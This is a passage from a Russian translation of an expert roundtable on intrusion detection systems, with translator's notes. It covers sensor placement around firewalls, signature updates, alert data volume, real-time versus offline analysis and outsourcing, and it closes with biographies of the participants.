числа мест обнаружения атак: на сетевом уровне (на межсетевых экранах, на коммутаторах, на маршрутизаторах), на уровне операционной системы (на серверах, на рабочих станциях) и на прикладном уровне (в СУБД или на сервере SAP, например). Для технологичности, , мы будем видеть, что системы станут более простыми в функционировании и более &quot;приборо-подобными&quot;, чтобы встроить их в сетевую инфраструктуру без внесения в последнюю серьезных изменений. В области качества обнаруженияатак мы увидим, что логика распознавания атак начнет включать модели построения поведенческих профилей и отклонений от этого профиля. Будет намного больше &quot;интеллекта&quot; в определении того, что является неправильным использованием ресурса или атакой. Общее число атак с ростом сетевых технологий неизбежно увеличится.</p> <p>Ранум: Я думаю, мы увидим объединение сигнализирующих и экспертных систем обнаружения атак. Эти системы будут интегрированы в средства сетевого управления. Мы, специалисты в области защиты, должны прекратить решать отдельные проблемы сетевого управления. Поиск ошибок, обнаружения атак и т.п. – все это разные аспекты одной и той же проблемы - проблемы сетевого управления.</p> <p>Спаффорд: Исследования в этой области все еще идут. Мы до сих пор не очень хорошо понимаем, за ЧЕМ надо наблюдать, КАК надо наблюдать и ЧТО делать после обнаружения? Я думаю, что следующая проблема, которая встанет перед коммерческими системами обнаружения атак – автоматизированное реагирование на некоторые виды нарушений. Мы видим, что появляются системы, заменяющие правила межсетевых экранов и маршрутизаторов (яркий пример такой системы - RealSecure - примечание переводчика). Системы станут больше отвечать термину &quot;активная обороноспособность&quot;, потому что функции обнаружения и реагирования будут объединены в одном ядре системы. Такие системы станут распространенными в следующие 2-3 года (необходимо отметить, что такие системы уже получили широкое распространение. Сейчас очень трудно встретить систему, которая бы только обнаруживала атаки, но никак не реагировала на них - примечание переводчика).</p> <p>Саттерфилд: Научно-исследовательские институты выполнили неплохую работу. Фактически, именно эти исследования дали первый опыт в области обнаружения атак нашей компании. Однако, институты слишком инерционны, чтобы направить новые исследования в нужную сторону. Они очень много усилий вкладывают в область обнаружения атак. Сейчас намечается постепенный возврат к &quot;аномальному&quot; подходу, значение которого было недооценено несколько лет назад. Я думаю, что в реализации обнаружения аномального поведения уже не будет допущено столько ошибок. Мы учтем уроки, полученные в результате исследований систем обнаружения злоупотреблений (misuse). Мы начинаем работать с некоторыми институтами и надеемся, что это будет взаимовыгодное сотрудничество. Время покажет.</p> <p>Ранум: Практически все исследования систем обнаружения атак проводятся в области применения экспертных систем, поскольку они наиболее интересны с технической точки зрения и более вероятно, что работа в этой области действительно принесет нечто полезное. Большая проблема, которую я вижу, это игнорирование задач, связанных с сетевым управлением, а ведь &quot;реальная защита равна сетевому управлению&quot;. Современные системы не имеют интуитивного интерфейса или настолько громоздки, что их очень трудно использовать. Я думаю, что хорошие идеи из области научных исследований переместятся в коммерческие системы.</p> <p>Карри: Пару десятилетий изучение технологий обнаружения атак было прерогативой исследовательских лабораторий. До сих пор коммерческий сектор не обращал внимания на эти исследования и занимался повторным изобретением колеса. Но поскольку важность защиты продолжает расти, промежуток между исследовательскими проектами и коммерческими изделиями постоянно сокращается.</p> <p>Спаффорд: Могу назвать несколько исследовательских лабораторий, которые за последние несколько лет провело успешную работу в области обнаружения атак. Это UC Davis, Haystack Labs и LANL. Эти работы привели к успешному созданию большого числа систем, среди которых можно назвать ASIM, Stalker, NADIR и др.</p> <p>В лаборатории COAST рассмотрели ограничения и основные проблемы, связанные с областью обнаружения атак. Мы не начинаем с вопроса: &quot;Хорошо, система дает нам X. Мы хотим Y. Что надо сделать, чтобы система, дающая X, давала нам Y?&quot; Вместо этого, мы решаем задачи, связанные с обнаружением атак и злоупотреблений целиком, от начала до конца, и пробуем найти эффективные решения. Например, Юджин Ким (Gene Kim) и я начали разработку системы Tripwire с вопроса: &quot;Что является характерным практически для каждой попытки злоупотребления или атаки?&quot; Ответ: обращение (исследование) к локальным файлам или их изменение (&quot;взлом&quot;). Таким образом, мы разработали систему, которая хранит &quot;слепок&quot; файла и обнаруживает злоупотребление этим файлом. Другой пример, разработка Сандипом Кумаром (Sandeep Kumar) и мной системы обнаружения атак IDIOT (Intrusion Detection In Our Time). Мы проанализировали, что реально можно обнаружить в системе, а затем разработали инструмент, который смог бы обнаруживать это наиболее эффективно. Результат – система обнаружения атак на уровне хоста (host-based), которая практически не снижает производительности и имеет очень широкую область применения. Чему мы научились в процессе этой работы, так это тому, что большинство коммерческих систем не хранит информацию обо всех действиях также эффективно, как это сделано в системе IDIOT. Теоретически возможно обнаружить большое количество различных форм злоупотреблений, но операционные системы не обеспечивают нас поддержкой, позволяющей контролировать каждое действие. В результате большинство современных систем требуют оснащения защищаемых систем специальной аппаратурой для сбора необходимой информации. Как следствие, это приводит к снижению производительности и эффективности системы, а также к увеличению хранимых и обрабатываемых контрольных данных.</p> <p>Сегодня лаборатория COAST сосредоточила свое внимание на четырех направлениях технологии обнаружения атак. Во-первых, определение информации, которая должна храниться в журналах регистрации, и способа их сбора для наиболее эффективного управления любой системой обнаружения атак. Во-вторых, определение наилучшей структуры и формата хранения регистрационных данных, чтобы они могли быть быстро обработаны, не требуя больших объемов памяти для хранения и обработки. В-третьих, перемещение обработки контрольных данных с центральной консоли ближе к фактическому источнику этих данных. Это реализуется в нашем проекте агента обнаружения атак AAFID (демо-версия данного агента может быть загружена с Web-сервера лаборатории - примечание переводчика). И, в-четвертых, определение того, как результаты исследований в первых трех направлениях могут быть реализованы в программном обеспечении.</p> <p>Я думаю, что успех некоторых из рекламируемых сейчас систем обнаружения атак поощрит разработчиков операционных систем создать открытый интерфейс для интеграции с механизмами регистрации данных. Меня также волнует, что с системами обнаружения атак может произойти то, что произошло с межсетевыми экранами, когда на рынке появилось большое число &quot;экспертов&quot; в области безопасности и фирм с небольшими модификациями существующих технологий. В чем состоит проблема? В потере и непонимании основных принципов. Например, термин &quot;firewall&quot; (&quot;межсетевой экран&quot;) появился приблизительно 7 лет назад. Фактически, насколько нам удалось обнаружить, термин &quot;firewall&quot; появился в 1991 году, в книге &quot;Practical Unix Security&quot; (признаю, что это моя оплошность, т.к. я ввел этот термин).Однако последний месяц ознаменовался первым появлением формальной модели межсетевого экрана, выполненной одним из моих студентов – Кристофом Шуба (Christoph Schuba). Люди были так заняты продажей межсетевых экранов, предоставлением обучающих программ для межсетевых экранов и их рекламой, что пренебрегли исследованиями того, что в действительности должен представлять собой межсетевой экран. Интересно то, что когда мы сравнили все коммерческие межсетевые экраны с моделью Кристофа, все они имели отсутствующие компоненты. Я вижу нечто подобное и в области обнаружения атак. Имеется потребность в таких системах. Давление на производителей систем обнаружения атак приведет к тому, что научные исследования и разработка соответствующей теории не будут выполнены. Уже сейчас акцент разработки в значительной степени смещается, и она ведется без понимания основополагающих принципов. Рынок средств защиты (а также средств управления) недостаточно поддерживает соответствующие исследования, проводимые в академических кругах, и в то же время многие университеты стимулируют перспективных студентов для выполнения этой работы.</p> <p>Таким образом, я думаю, что и продавцы, и заказчики систем обнаружения атак должны поддерживать научно-исследовательские институты для проведения базисных исследований вместо постоянной модификации одних и тех же идей снова и снова (что и происходит сейчас). Мы нуждаемся в радикально новых идеях в этой (и других) областях.</p> <p>Как системы обнаружения атак &quot;приноравливаются&quot; к другим мерам защиты (фильтрация, proxy, межсетевые экраны и т.п.)? Что делает предложение систем обнаружения атак уникальным?</p> <p>Ранум: Это не совсем правильная аналогия. Фильтрация, proxy, межсетевые экраны подобны броне вокруг Вашей сети. Системы обнаружения атак подобны хирургу, который сообщает Вам, что пуля прошла мимо вашей спины (т.е. не задела что-то важное - примечание переводчика). Первоначальная идея систем обнаружения атак состояла в том, что они были пассивными, т.е. &quot;Системами Обнаружения Атак&quot; (&quot;Intrusion Detection System&quot;), а не &quot;Экспертами по Отражению Атак&quot; (&quot;Intrusion Countermeasure Expert&quot; – ICE из Neuromancer). Межсетевые экраны и т.д. разработаны для активной или пассивной защиты, а системы обнаружения атак – для активного или пассивного обнаружения.</p> <p>Карри: Это другой инструмент из защитного арсенала и он не должен рассматриваться как замена для любого из перечисленных механизмов. Конечно имеются некоторые перекрытия. Особенно с межсетевыми экранами. Последние уже выполняют некоторые ограниченные функции обнаружения атак, поднимая тревогу, когда &quot;срабатывает&quot; соответствующее правило. Системы обнаружения атак уникальны в том, что в отличие от межсетевых экранов, выполняющих множество различных функций (фильтрация пакетов, аутентификация пользователей, кэширование и т.д.), в них реализована всего одна функция, но реализована хорошо. Обнаружение атак в реальном масштабе времени, особенно на высоких сетевых скоростях, требует значительного количества выделенных ресурсов, которых не может обеспечить ни один из межсетевых экранов, кроме, пожалуй, самого дорогого и сложного.</p> <p>Саттерфилд: Системы обнаружения атак в значительной степени дополняют названные технологии. В некоторых случаях они могут заменять фильтрацию, proxy и т.п. В других случаях это будет другой уровень защиты. Дистанционно управляемая система обнаружения атак позволяет контролировать потоки данных в реальном масштабе времени. Я полагаю, что это будет иметь огромное воздействие на то, как мы будем управлять сетями в будущем. Текущее управление сетью сосредоточено на идентификации и управлении структурой и конфигурацией сети. Управление, основанное только на этой информации, подобно управлению строительством скоростного шоссе без знания структуры движения на нем. Технология обнаружения атак позволяет контролировать поток данных аналогично наблюдению за структурой движения на скоростном шоссе.</p> <p>Клаус: И обнаружение атак, и анализ защищенности – критичные компоненты эффективной стратегии защиты. Вы имеете межсетевой экран, так? Отлично. Вы знаете, работает он или нет? Вы имеете туннели через межсетевой экран, правильно? Они используются? Ваши внутренние системы были атакованы когда-нибудь? Откуда Вы это знаете? Что Вы должны делать после этого? Мир изменяется каждый день. Секрет эффективной защиты информации в разработке политики безопасности, введении ее в эксплуатацию, аудите и регулярном их пересмотре. Вы не сможете этого сделать без использования технологий обнаружения атак и анализа защищенности.</p> <p>Спаффорд: Межсетевые экраны и фильтрация предназначены для того, чтобы предотвратить вторжение &quot;плохих парней&quot; из сети. Однако иногда эти механизмы терпят неудачу из-за ошибок разработки, аппаратных отказов, ошибок пользователей или просто невежества. Например, кто-то не понимает необходимости защиты сети и включает свой модем для доступа к рабочему компьютеру из дома. Межсетевой экран и proxy не могут не только защитить в этом случае, но и обнаружить этот случай. Системы обнаружения атак могут помочь в этом. Независимо от того, какова надежность фильтрации, пользователи зачастую находят способы обойти все Ваши преграды. Например, объекты ActiveX могут представлять новые направления для реализации угроз через межсетевые экраны. И, наконец, в большинстве систем наибольшую угрозу представляют люди, пользователи, действия которых должны также контролироваться.</p> <p>Где должна быть размещена система обнаружения атак? Опишите за и против размещения систем обнаружения атак до и после межсетевого экрана. Каковы недостатки каждого из вариантов?</p> <p>Ранум: Я бы поместил систему обнаружения атак внутри. Почему я должен заботиться, нападает ли кто-то вне моего межсетевого экрана? В случае если они проникнут внутрь, система обнаружения атак должна определить это. Размещение системы снаружи быстро убаюкает бдительность администратора. Как-то я использовал высокоэффективный межсетевой экран, который предупреждал меня, когда происходила атака. Двумя неделями позже я удалял предупреждающие сообщения еще до их прочтения. Другой важный фактор, говорящий за помещение системы обнаружения атак внутрь, что далеко не все атаки происходят снаружи. Такое размещение позволит обнаружить новое сетевое соединение или атакующих, проникших через &quot;черный ход&quot;, например, через модем.</p> <p>Карри: Система обнаружения атак должны быть размещена там, где она сможет контролировать наиболее интересующий вас трафик. Например, если Вы опасаетесь вторжения из Internet, то имеет смысл поместить систему обнаружения атак снаружи межсетевого экрана. Это позволит &quot;свободно&quot; контролировать весь входящий трафик. Если вы помещаете систему внутрь, то вы не видите всего трафика, приходящего из Internet, в том числе и от &quot;плохих парней&quot;.</p> <p>Саттерфилд: Система обнаружения атак играет важную роль и внутри и снаружи межсетевого экрана. Снаружи межсетевого экрана система обнаружения атак контролирует трафик, приходящий на почтовые и Web сервера (размещенные в DMZ - примечание переводчика). Что более важно, такое размещение позволяет видеть трафик, который обычно блокируется межсетевым экраном и остается необнаруженным внутренними системами. Внешнее расположение также дает выгоду в случае постоянного контроля сетевых услуг, &quot;законных&quot; для межсетевого экрана (например, контроль почтовых бомб в SMTP-трафике – примечание переводчика). Внутреннее размещение позволяет контролировать трафик во внутренней, защищаемой сети. Это важно, особенно для защиты от авторизованных пользователей. Главный же недостаток такого размещения – невозможность контроля трафика, приходящего из внешних, недоверенных сетей. При таком размещении система обнаружения атак не в состоянии вовремя предупредить об очевидных сигналах о надвигающейся атаке (например, при сканировании портов – примечание переводчика).</p> <p>Клаус: Снаружи межсетевого экрана – это почти всегда хорошая идея. Защита устройств, находящихся в демилитаризованной зоне и дополнительный уровень защищенности внутренней сети. После межсетевого экрана – тоже неплохо. Обнаружение попыток несанкционированного использования туннелей через межсетевой экран и превосходный источник данных о его функционировании. Однако быть может самым лучшим местом развертывания системы обнаружения атак будет ваша intranet. Каждый согласится, что атака не единственное событие, приносящее вред. Существуют еще мошенничество, шпионаж, воровство и неправильное использование сетевых ресурсов. Системы обнаружения атак также эффективны внутри сети, как и снаружи, особенно, если они просты в эксплуатации и не влияют на производительность сети.</p> <p>Спаффорд: Система обнаружения атак всегда должна находиться после межсетевого экрана, чтобы обнаружить злоупотребления, совершаемые авторизованными пользователями, и некоторые типы атак, &quot;проходящие&quot; через межсетевой экран. Размещение снаружи может быть полезным, если вы хотите контролировать атаки на межсетевой экран и осуществлять контроль трафика, блокированного межсетевым экраном. Однако развертывание системы обнаружения атак будет бесполезным, если вы не до конца понимаете топологию и состав своей сети.</p> <p>Как система обнаружения атак может модифицироваться, чтобы защищать против новых атак? Откуда можно получать новые профили атак? Каким образом? В чем могут возникнуть проблемы?</p> <p>Карри: Это важные вопросы, которые должны тщательно рассматриваться при выборе системы обнаружения атак. Системы, основанные на профилях нападений хороши настолько, насколько хороши их базы данных сигнатур. Администратор должен иметь возможность создавать свои сигнатуры для известных атак. Реальный тест – может ли продавец не отставать от новых нападений и не только своевременно создавать новые сигнатуры, но и позволять корректировать старые, как временную меру. Механизмы распределения также важны. Когда Вы имеете дело с десятками, сотнями или тысячами модулей слежения системы обнаружения атак в одной компании, идея о ходьбе к каждому компьютеру с дискетой или CD-ROM неосуществима. Идеально, если система может быть дополнена новыми сигнатурами дистанционно. Чтобы принять меры против внесения поддельных сигнатур атак (например, как это произошло с распространением через сеть FIDO поддельных обновлений антивирусной базы для программы Dr.Web – примечание переводчика), необходимо использовать механизмы аутентификации и шифрования. Модификация сигнатур должна осуществляться без прерывания процесса обнаружения.</p> <p>Саттерфилд: Идеально, если система обнаружения атак модифицируется, как минимум, ежеквартально. Сигнатуры атак строятся на основе бюллетеней безопасности, появляющихся в результате создания новых приложений, несущих в себе новые уязвимости. Самая лучшая модель модификации сигнатур в системах обнаружения атак представлена в антивирусных программах. В конечном счете, заказчики должны иметь возможность регулярной загрузки новых сигнатур, чтобы гарантированно иметь самую последнюю информацию об уязвимостях. Механизм распределения сигнатур должен быть построен в первую очередь по технологии &quot;pull&quot;, а не &quot;push&quot; (т.е. вы должны получать обновления у производителя по своей инициативе, а не по его – примечание переводчика). Большинство заказчиков не хочет иметь автоматически модифицируемые системы из-за сложностей в управлении и повышенного риска безопасности. Желательно, если система &quot;предупредит&quot;, что база данных сигнатур устарела и требует модификации. Затем система соединяется через Internet с Web-сервером производителя и загружает новую версию базы данных сигнатур.</p> <p>Клаус: Имеется два источника получения новых сигнатур атак: компании (подобно ISS) и непосредственно пользователи. Хорошая система обнаружения атак должна не только получать регулярные обновления от экспертов компании-производителя, но и иметь механизм, позволяющий пользователям добавлять свои, специфичные сигнатуры. Поддержка системы обнаружения атак в актуальном состоянии требует постоянных усилий для проведения соответствующих исследований.</p> <p>Ранум: В идеале, система обнаружения атак должна модифицировать сама себя. Как минимум, система обнаружения атак требует модификации словаря атак. Новые атаки будут появляться постоянно. Это закономерно. Но кто их разрабатывает? Прямо сейчас я вижу беспокоящую меня тенденцию, согласно которой, в компаниях, которые проектируют программные средства защиты, нанимают хакеров для разработки новых атак. Это мало чем отличается от использования труда вирусописателей компаниями, разрабатывающими антивирусные программы. Уже известен случай, когда инженер одного из производителей средств обнаружения атак опубликовал в журнале Phrack исходный текст инструментария для создания атаки SYN Flood типа &quot;отказ в обслуживании&quot; (&quot;denial of service&quot;). Спустя несколько недель этот производитель объявил, что они могут обнаруживать и блокировать атаку SYN Flood. Такое неэтичное поведение выставляет всех нас в плохом свете.</p> <p>Спаффорд: Это зависит от используемой технологии. Если система обнаружения атак функционирует по принципу сравнения с сигнатурой, то необходимо загружать новые сигнатуры. Аналогично антивирусным сканерам. Если система обнаруживает аномальное поведение, то просто необходима периодическая подстройка. Например, система Tripwire не нуждается в модификации для получения новых атак. Необходимо только добавлять новые ресурсы, необходимые для контроля. Для систем, нуждающихся в новых профилях атак, их получение зависит от продавца или любой другой обслуживающей компании, обеспечивающей новые сигнатуры. Администратор может и сам создавать такие шаблоны, но это утомительно, требует большого количества исследований и подвержено ошибкам больше, чем в случае с профессиональными компаниями.</p> <p>Какие проблемы создают объемы данных, собранных системой обнаружения атак? Как ваше изделие решает эти проблемы? Как вы уменьшаете объем данных? Как вы уменьшаете число ложных тревог? Как анализируются эти данные? Какие требования предъявляются к персоналу, использующему вашу систему? Какие требования к обучению? Какие аргументы за и против аутсорсинга вашей системы?</p> <p>Клаус: Переполнение данных – одна из главных проблем с системами обнаружения атак. Имеется два основных пути – управление отчетами программы и наличие &quot;здравых&quot; средств управления данными. Хорошая система обнаружения атак должна иметь возможность точной настройки – некоторые атаки могут обнаруживаться, а могут и нет; определенные атаки могут изменять некоторые свои параметры (например, число портов, открытых в определенный промежуток времени, – примечание переводчика), варианты реагирования также могут быть настроены. Эта настройка позволяет вам управлять тем, что и как сообщает вам система обнаружения атак. Хорошая идея – интегрировать средство обнаружения атак с системой анализа защищенности. Это позволит вам сконцентрироваться на самых важных данных, сохранив менее критичные данные для последующего анализа. Хорошая система обнаружения атак способна генерировать сообщения об атаке, выдавать их на экран, и иметь контекстно-зависимую справочную систему. Она также должна иметь эффективные механизмы управления данными, чтобы персонал мог анализировать собранные данные удобным для себя образом. Персонал, работающий с системой обнаружения атак, должен не только быть обучен правилам работы с ней, но и знать, как интегрировать ее в инфраструктуру своей организации.</p> <p>Что касается аутсорсинга, то компании могут иметь разные точки зрения на него. Некоторые не используют аутсорсинг, так как созданных системой обнаружения атак данных достаточно для принятия соответствующих решений. Другие, напротив, желают воспользоваться аутсорсингом, поскольку они не так хорошо разбираются в защитных механизмах и технологиях и им необходима сторонняя помощь. Все это зависит от критичности данных и здравого смысла конечного пользователя системы обнаружения атак.</p> <p>Ранум: Если вы записываете весь трафик на загруженной сети, то недорогой жесткий диск будет делать это медленнее, чем система обнаружения атак &quot;пишет&quot; на него (например, в сетях Fast Ethernet пропускная способность равна 100 Мбит/сек, а скорость доступа к современным &quot;стандартным&quot; жестким дискам равна 24-80 Мбит/сек – примечание переводчика). Вы должны знать, что сохранять, а что нет. Например, если вы контролируете доступ к Web-серверу, то, вероятно, нет необходимости сохранять все графические GIF-файлы. Полезнее хранить URL к ним. Если вы – секретная спецслужба, ищущая секретные данные в изображениях (стеганография - наука о методах скрытия самого факта передачи сообщения, в т.ч. и скрытие данных в графическом изображении – примечание переводчика), то вы предъявляете совершенно другие требования. Приспосабливаемость к различным требованиям по управлению данными является большой проблемой современных систем обнаружения атак, – сколько данных записывать; как долго их хранить; как представить их конечному пользователю? Я чувствую, что большинство пользователей не захочет иметь дела с этими проблемами. Им проще будет приобрести систему обнаружения атак, как часть комплексного решения по обеспечению информационной безопасности сети, предлагаемого внешней организацией и поддерживаемого 24 часа в сутки, 7 дней в неделю (аналогичные услуги в последнее время получили широкое распространение за рубежом – примечание переводчика).</p> <p>Карри: Проблема не в количестве данных. Это всего лишь побочный эффект. Реальная проблема в том, что вы будете делать, когда система обнаружения атак уведомит вас о нападении? Когда вы получаете такое уведомление, вы должны реагировать быстро и правильно – любая ошибка может стоить вам дорого. Кроме того, вы не можете уменьшить число ложных срабатываний без риска пропустить реальную атаку. Таким образом, вы должны уметь отделять зерна от плевел. Как только вы решили, что тревога реальна, что это значит? Как вы реагируете? Автоматический ответ хорош, но это последнее, что вы должны предлагать своим заказчикам. То есть вы нуждаетесь в постоянном человеческом присутствии и возможности обработки оператором почти всех тревог. Это требует выделенного, опытного персонала, который постоянно контролирует эти атаки, знает, как они реализуются и, что более важно, знает, что с ними делать. Обучение и укомплектование персонала для решения этой задачи сложно – большинство компаний не имеет такой возможности, не может себе позволить создавать такие подразделения, не имеет на это времени и, даже если они смогли бы сформировать их, то у них нет на это соответствующих материальных ресурсов.</p> <p>Саттерфилд: Действительно, управление данными – самая большая проблема перед всем семейством средств защиты информации. Это особенно важно для технологии обнаружения атак. На скоростях 100 Мбит/сек и выше система обнаружения атак должна собирать и анализировать большое количество данных. Ранние прототипы систем обнаружения атак фиксировали нажатия клавиш, которые сохранялись на локальном жестком диске и затем, ночью, передавались на центральную консоль для обработки на следующий день. Это работало, но было не оперативно и не соответствовало требованиям работы в реальном режиме времени.</p> <p>Современные технологии оперируют интеллектуальными датчиками, которые собирают только те пакеты, которые могут содержать возможные нарушения защиты. Пакеты анализируются датчиком, а затем, в виде кодированного сигнала передаются дальше. Фактические данные, вызвавшие тревогу, доступны, но уже не имеют большого значения. Дело в том, что датчик должен быть интеллектуальным и должен уметь выбирать только важную информацию. Остальное игнорируется. Это единственный способ создать крупномасштабную систему обнаружения атак, функционирующую в реальном режиме времени с заданной эффективностью. Эта технология очень мощная. Она обеспечивает сбор и отображение заинтересованным лицам всей информации об уровне защищенности организации. Хорошая система обнаружения атак будет разрабатываться таким образом, чтобы она могла эксплуатироваться обычным техником. Однако, пока все еще необходима экспертиза для анализа данных и выработки варианта реагирования. &quot;Пробел в умении защищать&quot; не дает многим организациям понять, как себя защищать на достаточно серьезном техническом уровне. Следовательно, я думаю, что большое количество организаций обратится к аутсорсингу в области сетевой безопасности. Мы часто слышим от клиентов, что их компании &quot;не нуждаются в аутсорсинге&quot;. Однако, после того, как мы им демонстрируем требования к обучению и затраты на 24-часовое поддержание соответствующего уровня безопасности они пересматривают свои позиции. Часто задается один вопрос. Кому вы скорее доверите свою защиту? Служащим, которые могут на следующей неделе работать на ваших конкурентов, или поставщику услуг, связанному контрактом? Этот вопрос обычно ведет к очень интересному обсуждению. Сотрудники службы аутсорсинга - это текущий контроль местных тревог. Фактически, потребители поняли, что системы оповещения, расположенные на предприятии, имеют мало значения, если они не имеют удаленного контроля. Сколько раз вы останавливались на улице, чтобы узнать, почему раздается сигнал тревоги из дома соседа? Ответ – вы обычно ждете шестичасовых новостей, чтобы узнать об этом.</p> <p>Спаффорд: Системы обнаружения не должны генерировать много данных. Что касается заданных вопросов, то позвольте мне обратить ваше внимание, что мы проводим исследования в этих областях (за исключением обучения и укомплектования персоналом) и пока не нашли лучшего решения.</p> <p>Сравните и противопоставьте системы генерации тревог, функционирующие в реальном масштабе времени, с системами отложенногоанализа? Как функционирует ваша система? Что все-таки с укомплектованием персоналом?</p> <p>Саттерфилд: Автономный анализ (offline analysis) трафика с целью генерации тревог практически бесполезен. Министерство обороны США, являясь пионером в области обнаружения атак, придерживалось этого подхода. Однако времена меняются. Обработка нажатий клавиш уже не отвечает требованиям масштабируемости. Обнаружение и генерация тревог в реальном масштабе времени существенно необходимы. Хотя и об автономном анализе данных не надо забывать.</p> <p>Клаус: Как я упомянул раньше, современные системы обнаружения атак – это реальная сетевая информация и инструментальные средства с некоторым встроенным интеллектом. Проанализированы ли данные в реальном масштабе времени или после свершения события, - различие только в своевременности реагирования. Система RealSecure обеспечивает обнаружение и реагирование на атаки в реальном масштабе времени. Мы также обеспечиваем средства управления данными для проведения автономного анализа. Анализ данных &quot;постфактум&quot; очень полезен при наличии обученного персонала. Требуемый состав персонала для эксплуатации системы обнаружения атак очень трудно определить, поскольку это зависит от объема данных, требующих анализа. Важно, чтобы системы обнаружения атак поддерживали этот процесс, предоставляя эффективные средства управления данными.</p> <p>Карри: Если вы серьезно относитесь к защите, вы должны работать в реальном масштабе времени. Нападавший может войти, сделать то, что он должен и уйти в течение нескольких минут или даже секунд. Вы должны быть способны действовать мгновенно, чтобы среагировать на нападение. Автономный анализ нужен, если вы хотите знать, что вы делали в последний вторник. К сожалению, вы не имеете достаточно времени, чтобы проводить такой анализ. Хорошо то, что эта задача может быть легко автоматизирована и не требует большого числа людей.</p> <p>Спаффорд: Тревога в реальном масштабе времени – это когда вы можете среагировать и устранить результат атаки, слушая сигнал тревоги. Автономный анализ часто снижает производительность контролируемых машин (за счет обработки и хранения большого объема регистрационных данных – примечание переводчика), однако также позволяет &quot;сделать шаг назад&quot;, вновь рассмотреть событие и, возможно, &quot;откатить&quot; изменения, сделанные в результате реагирования. Если действие не привело к ожидаемым результатам, если тревога не сработала, то нет никакой разницы между автономным анализом и анализом в реальном масштабе времени! Вы называете ваш продукт системой обнаружения атак? Некоторые специалисты различают атаку (intrusion) и злоупотребление (misuse). Некоторые называют эти средства не системы обнаружения атак, а системы мониторинга сети. Каково ваше определение системы обнаружения атак?</p> <p>Ранум: Мы называем нашу систему универсальным инструментом анализа трафика. Она имеет свойство программируемости, так что вы можете сами &quot;сказать&quot; ей, что надо обнаруживать. Если вы хотите обнаруживать, скажем, атаку SYN Flood, то вы можете сами запрограммировать функцию чтения SYN-пакетов и функцию реагирования в случае нахождения в них статистических аномалий. Также просто вы можете запрограммировать модель анализа роста WAN или подсчета посещений Web-сервера. Я думаю, что обнаружение атак – это одна из задач, которую вы можете решить с помощью нашей универсальной системы. Мы считаем, что люди устали от приобретения систем, которые реализуют только одну функцию. Даже, если она реализована хорошо.</p> <p>Карри: Компания IBM предлагает обслуживание, которое объединяет предложение систем обнаружения атак в реальном режиме времени (компания IBM предлагает систему RealSecure компании ISS – примечание переводчика), круглосуточный текущий контроль обученным персоналом и опытную группу экспертов, реагирующих на нарушения и инциденты безопасности. Мы различаем термины &quot;злоупотребление&quot; и &quot;атака&quot;, но давайте не будем сейчас останавливаться на этом. Мы полагаем, что система обнаружения атак – больше чем несколько датчиков, развернутых в сети. Вы нуждаетесь в сообщающейся системе, которая позволяет вам собирать информацию от датчиков на центральной консоли. Вы нуждаетесь в системе, хранящей эту информацию для более позднего анализа, и в средствах, чтобы такой анализ провести. Вы нуждаетесь в средствах, контролирующих эти датчики постоянно и мгновенно реагирующих в случае тревоги. Атака может быть завершена за минуты и даже секунды. В заключение, и возможно это наиболее важно, вы нуждаетесь в группе выделенных экспертов в области защиты, которые знают, как использовать все эти средства для всесторонней защиты от постоянно растущих угроз. Все эти компоненты вместе образуют реальную и эффективную систему обнаружения атак. Если вы реализуете ее без какого-либо из этих компонентов, то вы только вводите себя в заблуждение.</p> <p>Саттерфилд: Все сводится к семантике. &quot;Обнаружение атак&quot; – термин, используемый для описания конечной цели деятельности. Вы должны обнаружить, когда кто-то делает что-то, что дает ему доступ к чему-то, к чему у него доступа быть не должно. В действительности, технология обнаружения атак обеспечивает способность обнаружить что-то, что пользователь хочет обнаружить. Думайте об этом, как о микроскопе или телескопе для потока данных. Фактически, обнаружение злоупотреблений – только один из вариантов использования технологии обнаружения атак. Базовая технология позволяет вам просматривать сетевой пакет, только пакет, и ничего кроме пакета. Дальше вы можете увидеть что-нибудь другое, если увеличите &quot;размер изображения&quot;.</p> <p>Мониторинг – это хорошо. Обнаружение атак гораздо более эффективно, если осуществляется 24 часа в сутки, 7 дней в неделю. Стоимость таких услуг значительна. Мы полагаем, что компании, которые собираются предлагать эти услуги, хотят делать большой бизнес. Это обеспечит намного более высокое качество защиты ресурсов заказчиков, чем, если бы они сами реализовали у себя комплекс мер по обнаружению атак. Поставщики услуг могут выбирать технологии, позволяющие масштабировать и дублировать свои решения, тем самым, снижая издержки и свои, и заказчиков. Наблюдайте за выбором системы обнаружения атак крупными поставщиками услуг. Это будет показателем качества предлагаемых на рынке систем обнаружения атак.</p> <p>Клаус: Опасно игнорировать термин &quot;злоупотребление&quot;. Единственное различие, которое я делаю между &quot;обнаружением атак&quot; и &quot;обнаружением злоупотреблений&quot; – исходит ли нарушение снаружи сети (это атака) или изнутри сети (это злоупотребление). Оба потенциально разрушительны. Система RealSecure может быть развернута как снаружи межсетевого экрана, так и после него, что позволяет обнаружить как внешних злоумышленников, так и внутренних участников злоупотреблений. И она может реагировать на оба события. Еще можно сказать о различии между терминами так: &quot;злоупотребление&quot; определяет действие, которое нарушает стратегию использования сети (например, посещение порносайтов), в то время как, &quot;атака&quot; определяет действие, которое указывает на то, что кто-то атакует и ставит под угрозу защиту сети. Оба этих действия важны для администратора защиты и системы обнаружения атак, подобно RealSecure, могут обнаружить и помочь предотвратить оба этих действия. </p> <p>Спаффорд: Для нас, атака – это подмножество злоупотребления. Посторонние атакуют систему, чтобы неправильно использовать ее. Однако авторизованные пользователи также могут злоупотреблять системой. Сетевой мониторинг полезен для управления и оптимизации сети. Он также может использоваться для обнаружения атак и злоупотреблений. Однако он не может обеспечить вам контроль приложений, работающих на хосте.<br /><br /><br /> </p> <p>Девид Карри (David A. Curry) – старший аналитик по безопасности Internet в службе реагирования и помощи компании IBM (IBM Internet Emergency Response Service - IBM-ERS). Участник технической группы, отвечающей за управление инцидентами и реагирование на них для заказчиков IBM-ERS. Он также отвечает за создание бюллетеня Security Vulnerability Alert и разработку планов тестирования шлюзов заказчиков. Карри начинал как системный программист Unix. Работал системным программистом в университете Purdue, исследовательском центре NASA, лаборатории SRI и т.п. Автор нескольких книг по программированию для операционной системы Unix и обеспечению ее информационной безопасности.</p> <p>Кристофер Клаус (Christopher Klaus) – основатель и технический директор компании Internet Security Systems. Автор системы анализа защищенности на сетевом уровне Internet Scanner. Он обеспечивает консультационную поддержку в области безопасности многих государственных учреждений и компаний, входящих в список Fortune 500. Руководитель групп компании ISS, разрабатывающей системы Internet Scanner, System Security Scanner и RealSecure.</p> <p>Маркус Ранум (Marcus J. Ranum) – президент компании Network Flight Recorder и руководитель исследовательской группы корпорации V-ONE. Автор многих межсетевых экранов, включая DEC Seal, TIS Gauntlet и TIS Internet 